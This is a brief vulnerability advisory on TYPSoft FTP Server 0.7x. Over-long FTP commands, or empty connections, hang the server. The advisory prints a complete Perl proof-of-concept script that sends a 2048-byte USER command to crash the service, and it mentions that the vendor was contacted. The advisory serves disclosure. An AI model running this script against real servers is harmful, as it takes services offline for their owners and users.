COMMAND

    TYPSoft FTPd

SYSTEMS AFFECTED

    TYPSoft FTP Server 0.7x

PROBLEM

    'dethy' found following.   TYPSoft FTP is  a Freeware FTP  server,
    with  all  the  necessary  features  to  facilitate  beginners and
    advanced users.

    TYPSoft FTP Server does not correctly deal with long commands over
    2048 bytes [  2k ]. So  by sending a  long 'user', 'pass',  'cwd',
    etc, causing  the server  to hang  and increase  system resources.
    The process will not be active until it is manually restarted.

    This product is also vulnerable if you connect to the server,  but
    not  send  anything  (do  the  SYN/ACK  sequence  but   disconnect
    immediately).   This is  due to  the fact  that they  use a DELPHI
    TSocket class, which doesn't handle exceptions very well.

    Simple  script  to  send  a  long  'user'  command  to the server,
    resulting in the ftpd crashing:

        #!/usr/bin/perl
        use Getopt::Std;
        use IO::Socket;
        getopts('s:', \%args);
        if(!defined($args{s})){&usage;}
        $serv = $args{s};
        $foo = "A"; $number = 2048;
        $data .= $foo x $number; $EOL="\015\012";
        $remote = IO::Socket::INET->new(
		            Proto	=> "tcp",
		            PeerAddr	=> $args{s},
		            PeerPort	=> "ftp(21)",
		        ) || die("Unable to connect to ftp port at $args{s}\n");
        $remote->autoflush(1);
        print $remote "USER $data". $EOL;
        while (<$remote>){ print }
        print("\nCrash was successful !\n");

        sub usage {die("\n$0 -s <server>\n\n");}

SOLUTION

    The vendor has been contacted, wait until a patched version  comes
    out or use an alternative product.